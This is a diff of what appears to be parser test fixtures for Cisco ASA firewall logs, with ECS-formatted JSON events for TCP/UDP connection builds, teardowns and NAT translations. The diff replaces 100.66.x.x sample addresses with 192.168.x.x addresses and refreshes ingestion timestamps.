+10137,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11810", "source_interface": "outside", "mapped_destination_port": 1284 @@ -10159,8 +10159,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10195,7 +10195,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10206,8 +10206,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094977190Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", + "ingested": "2021-12-09T13:32:20.604438Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10244,8 +10244,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10280,7 +10280,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10291,8 +10291,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094978932Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", + "ingested": "2021-12-09T13:32:20.604441500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10329,8 +10329,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10365,7 +10365,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10376,8 +10376,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094980674Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", + "ingested": "2021-12-09T13:32:20.604445300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10409,8 +10409,8 @@ }, "destination": { "port": 8289, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1285, @@ -10450,7 +10450,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10458,8 +10458,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094982424Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289", + "ingested": "2021-12-09T13:32:20.604448600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10492,8 +10492,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10528,7 +10528,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -10537,8 +10537,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094984207Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", + "ingested": "2021-12-09T13:32:20.604452800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10554,7 +10554,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11811", "source_interface": "outside", "mapped_destination_port": 1285 @@ -10571,8 +10571,8 @@ }, "destination": { "port": 8290, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1286, @@ -10612,7 +10612,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10620,8 +10620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094985977Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290", + "ingested": "2021-12-09T13:32:20.604458200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10654,8 +10654,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10690,7 +10690,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10699,8 +10699,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094987736Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", + "ingested": "2021-12-09T13:32:20.604463600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10716,7 +10716,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11812", "source_interface": "outside", "mapped_destination_port": 1286 @@ -10738,8 +10738,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10774,7 +10774,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10785,8 +10785,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094989496Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", + "ingested": "2021-12-09T13:32:20.604468900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -10818,8 +10818,8 @@ }, "destination": { "port": 8291, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1287, @@ -10859,7 +10859,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10867,8 +10867,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094991241Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291", + "ingested": "2021-12-09T13:32:20.604474300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10901,8 +10901,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10937,7 +10937,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10946,8 +10946,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094992964Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", + "ingested": "2021-12-09T13:32:20.604479600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -10963,7 +10963,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11813", "source_interface": "outside", "mapped_destination_port": 1287 @@ -10985,8 +10985,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11021,7 +11021,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11032,8 +11032,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094994987Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", + "ingested": "2021-12-09T13:32:20.604484900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11070,8 +11070,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11106,7 +11106,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -11117,8 +11117,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094996765Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", + "ingested": "2021-12-09T13:32:20.604490400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11155,8 +11155,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11191,7 +11191,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11200,8 +11200,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094998495Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604495800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11217,7 +11217,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.107", + "mapped_source_ip": "192.168.100.107", "connection_id": "11814", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -11234,8 +11234,8 @@ }, "destination": { "port": 8292, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1288, @@ -11275,7 +11275,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11283,8 +11283,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095000230Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292", + "ingested": "2021-12-09T13:32:20.604501200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11317,8 +11317,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11353,7 +11353,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11362,8 +11362,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095001973Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", + "ingested": "2021-12-09T13:32:20.604506500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -11379,7 +11379,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11815", "source_interface": "outside", "mapped_destination_port": 1288 @@ -11401,8 +11401,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11437,7 +11437,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11447,8 +11447,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095003703Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", + "ingested": "2021-12-09T13:32:20.604511800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11485,8 +11485,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11521,7 +11521,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, 
@@ -11530,8 +11530,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095005519Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604517200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11547,7 +11547,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.104.8", + "mapped_source_ip": "192.168.104.8", "connection_id": "11816", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11569,8 +11569,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11605,7 +11605,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11615,8 +11615,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095007254Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", + "ingested": "2021-12-09T13:32:20.604522600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -11648,8 +11648,8 @@ }, "destination": { "port": 8293, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1289, @@ -11689,7 +11689,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11697,8 +11697,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095008983Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293", + "ingested": "2021-12-09T13:32:20.604528Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11731,8 +11731,8 @@ }, "source": { "port": 80, - "address": "100.66.123.191", - "ip": "100.66.123.191" + "address": "192.168.123.191", + "ip": "192.168.123.191" }, "tags": [ "preserve_original_event" @@ -11767,7 +11767,7 @@ "localhost" ], "ip": [ - "100.66.123.191", + "192.168.123.191", "172.31.98.44" ] }, @@ -11776,8 +11776,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095010725Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", + "ingested": "2021-12-09T13:32:20.604533300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -11793,7 +11793,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.123.191", + "mapped_source_ip": "192.168.123.191", "connection_id": "11817", "source_interface": "outside", "mapped_destination_port": 1289 @@ -11815,8 +11815,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11851,7 +11851,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11862,8 +11862,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095012450Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", + "ingested": "2021-12-09T13:32:20.604538700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11900,8 +11900,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11936,7 +11936,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -11947,8 +11947,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095014251Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", + "ingested": "2021-12-09T13:32:20.604544200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11985,8 +11985,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12021,7 +12021,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12030,8 +12030,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095016004Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604548100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12047,7 +12047,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11818", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -12069,8 +12069,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12105,7 +12105,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12115,8 +12115,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.095017764Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:32:20.604552400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12148,8 +12148,8 @@ }, "destination": { "port": 8294, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1290, @@ -12189,7 +12189,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -12197,8 +12197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095019498Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294", + "ingested": "2021-12-09T13:32:20.604557100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -12231,8 +12231,8 @@ }, "source": { "port": 80, - "address": "100.66.198.25", - "ip": "100.66.198.25" + "address": "192.168.198.25", + "ip": "192.168.198.25" }, "tags": [ "preserve_original_event" 
@@ -12267,7 +12267,7 @@ "localhost" ], "ip": [ - "100.66.198.25", + "192.168.198.25", "172.31.98.44" ] }, @@ -12276,8 +12276,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095021236Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", + "ingested": "2021-12-09T13:32:20.604561700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -12293,7 +12293,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.25", + "mapped_source_ip": "192.168.198.25", "connection_id": "11819", "source_interface": "outside", "mapped_destination_port": 1290 @@ -12315,8 +12315,8 @@ }, "source": { "port": 67, - "address": "100.66.48.1", - "ip": "100.66.48.1" + "address": "192.168.48.1", + "ip": "192.168.48.1" }, "tags": [ "preserve_original_event" @@ -12351,7 +12351,7 @@ "localhost" ], "ip": [ - "100.66.48.1", + "192.168.48.1", "255.255.255.255" ] }, @@ -12361,8 +12361,8 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-07-19T09:06:25.095022972Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", + "ingested": "2021-12-09T13:32:20.604565200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", "start": "2018-10-10T11:36:10.000Z", 
@@ -12415,8 +12415,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095024721Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.604569800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -12446,8 +12446,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.3.39",
- "ip": "100.66.3.39"
+ "address": "192.168.3.39",
+ "ip": "192.168.3.39"
 },
 "tags": [
 "preserve_original_event"
@@ -12482,7 +12482,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.3.39",
+ "192.168.3.39",
 "172.31.98.44"
 ]
 },
